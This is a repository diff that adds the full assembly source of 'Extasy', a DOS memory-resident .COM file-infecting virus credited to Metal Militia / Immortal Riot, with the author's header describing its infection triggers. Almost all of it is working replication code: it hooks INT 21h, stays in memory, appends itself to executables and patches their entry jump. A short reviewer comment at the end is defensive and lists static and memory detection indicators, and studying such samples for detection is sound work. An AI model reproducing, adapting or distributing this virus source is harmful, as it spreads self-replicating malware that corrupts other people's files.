Add files via upload
@@ -0,0 +1,197 @@
|
||||
; Virusname: Extasy
|
||||
; Origin: Sweden
|
||||
; Author: Metal Militia
|
||||
|
||||
; This virus can be found with any anti-virus program, since it's been
|
||||
; around for a while now. (SCAN/TB-SCAN/F-PROT/SOLOMON that is..)
|
||||
;
|
||||
; It's a resident .COM infector, without any encryption or stealth
|
||||
; capabilities. It infects when you execute (4bh) or closes (3eh).
|
||||
; This virus looks pretty much like RAVAGE, since it's pretty much
|
||||
; alike except for that RAVAGE infects .EXE files too.
|
||||
;
|
||||
; I stopped with this virus since it's so totally buggy that you'll find
|
||||
; it almost at once. This is the reason why i give you the source code.
|
||||
; In my later resident things, there will be such things as encryption,
|
||||
; stealth etc. i think..
|
||||
|
||||
|
||||
.model tiny
|
||||
.code
|
||||
.radix 16
|
||||
.code
|
||||
|
||||
viruslength = heap - _small
|
||||
startload = 90 * 4
|
||||
|
||||
_small:
|
||||
call relative
|
||||
oldheader dw 020cdh
|
||||
dw 0bh dup (0)
|
||||
relative:
|
||||
pop bp
|
||||
push ds
|
||||
push es
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
mov es,ax
|
||||
mov di,startload
|
||||
cmp word ptr ds:[di+25],di
|
||||
jz exit_small
|
||||
|
||||
lea si,[bp-3]
|
||||
mov cx,viruslength
|
||||
db 2Eh
|
||||
rep movsb
|
||||
|
||||
mov di,offset old21 + startload
|
||||
mov si,21*4
|
||||
push si
|
||||
movsw
|
||||
movsw
|
||||
pop di
|
||||
mov ax,offset int21 + startload
|
||||
stosw
|
||||
xchg ax,cx
|
||||
stosw
|
||||
|
||||
exit_small:
|
||||
pop es
|
||||
pop ds
|
||||
|
||||
or sp,sp
|
||||
jnp returnCOM
|
||||
|
||||
returnGNU:
|
||||
returnCOM:
|
||||
mov di,100
|
||||
push di
|
||||
mov si,bp
|
||||
movsw
|
||||
movsb
|
||||
ret
|
||||
|
||||
infect:
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push si
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
|
||||
mov ax,3d02
|
||||
int 21
|
||||
xchg ax,bx
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
push cs
|
||||
pop es
|
||||
|
||||
mov ax,5700h
|
||||
int 21h
|
||||
|
||||
push cx
|
||||
push dx
|
||||
|
||||
mov si,offset oldheader+startload
|
||||
|
||||
mov ah,3f
|
||||
mov cx,18
|
||||
push cx
|
||||
mov dx,si
|
||||
int 21
|
||||
|
||||
cmp ax,cx
|
||||
jnz go_already_infected
|
||||
|
||||
mov di,offset target + startload
|
||||
push di
|
||||
rep movsb
|
||||
pop di
|
||||
|
||||
mov ax,4202
|
||||
cwd
|
||||
int 21
|
||||
|
||||
cmp ds:[di],'ZM'
|
||||
jz infectNOT
|
||||
cmp ds:[di],'MZ'
|
||||
jz infectNOT
|
||||
|
||||
sub ax,3
|
||||
mov byte ptr ds:[di],0e9
|
||||
mov ds:[di+1],ax
|
||||
|
||||
sub ax,viruslength
|
||||
cmp ds:[si-17],ax
|
||||
jnz finishinfect
|
||||
|
||||
go_already_infected:
|
||||
pop cx
|
||||
jmp short already_infected
|
||||
|
||||
db "EXTASY!"
|
||||
db "(c) Metal Militia / Immortal Riot"
|
||||
|
||||
int21:
|
||||
cmp ax,4b00
|
||||
jz kewl
|
||||
cmp ax,3e00
|
||||
jnz oops
|
||||
mov ah,45
|
||||
int 21
|
||||
jmp kewl
|
||||
|
||||
oops:
|
||||
jmp chain
|
||||
|
||||
infectNOT:
|
||||
jmp go_already_infected
|
||||
|
||||
kewl:
|
||||
jmp infect
|
||||
|
||||
finishinfect:
|
||||
mov cx,viruslength
|
||||
mov dx,startload
|
||||
mov ah,40
|
||||
int 21
|
||||
|
||||
mov ax,4200
|
||||
xor cx,cx
|
||||
cwd
|
||||
int 21
|
||||
|
||||
mov ah,40
|
||||
mov dx,di
|
||||
pop cx
|
||||
int 21
|
||||
already_infected:
|
||||
pop dx
|
||||
pop cx
|
||||
|
||||
mov ax,5701h
|
||||
int 21h
|
||||
|
||||
mov ah,3e
|
||||
int 21
|
||||
exitinfect:
|
||||
pop es
|
||||
pop ds
|
||||
pop di
|
||||
pop si
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
chain:
|
||||
db 0ea
|
||||
heap:
|
||||
old21 dw ?, ?
|
||||
target dw 0ch dup (?)
|
||||
|
||||
endheap:
|
||||
end _small
|
||||
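Review bot: The header comment says every scanner catches this sample but never records what an analyst can match on, and `.radix 16` makes the constants easy to misread: the unsuffixed `90 * 4`, `18` and `21` are hexadecimal, while `5700h` and `21h` carry a suffix. I would document this beside `startload`, e.g. `; .radix 16 in effect: startload = 0240h, so the resident copy lives in the interrupt vector table at 0000:0240h`. The block after `relative:` then stores `int21 + startload` with a zero segment (`cx` is 0 after `rep movsb`) into the INT 21h slot, so an INT 21h vector whose segment is 0000 is a memory indicator worth stating in the header as well. The two `db` strings before `int21:` are written unencrypted into every infected file, and the rewritten file start begins with an `0E9h` near jump, which together give a simple static signature; the header could name both.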